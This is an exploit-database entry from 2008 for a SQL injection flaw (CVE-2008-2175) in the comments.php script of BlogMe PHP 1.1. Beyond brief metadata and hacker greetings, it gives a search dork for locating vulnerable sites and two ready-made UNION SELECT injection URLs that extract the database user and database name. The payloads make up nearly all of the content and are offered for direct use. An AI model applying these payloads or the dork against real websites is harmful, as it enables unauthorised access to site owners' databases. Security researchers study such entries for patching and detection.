BlogMe PHP 1.1 - 'comments.php' SQL Injection
Author: His0k4
type: webapps
platform: php
port:
date_added: 2008-05-02
date_updated: 2016-11-25
verified: 1
codes: OSVDB-44810;CVE-2008-2175
tags:
aliases:
screenshot_url:
application_url:
###########################################
{+} BlogMe PHP remote SQL injection exploit
{+} Script download : http://www.drumster.net/gamma/downloads/BlogMe11.zip
{+} Founded by : His0k4 [ ALGERIAN HaCkEr ]
{+} Greetz : All friends & muslims HaCkeRs...
{+} Dork : "BlogMe PHP created by Gamma Scripts"
###########################################
{+} Exploit :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
OR :
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--
###########################################
# milw0rm.com [2008-05-03]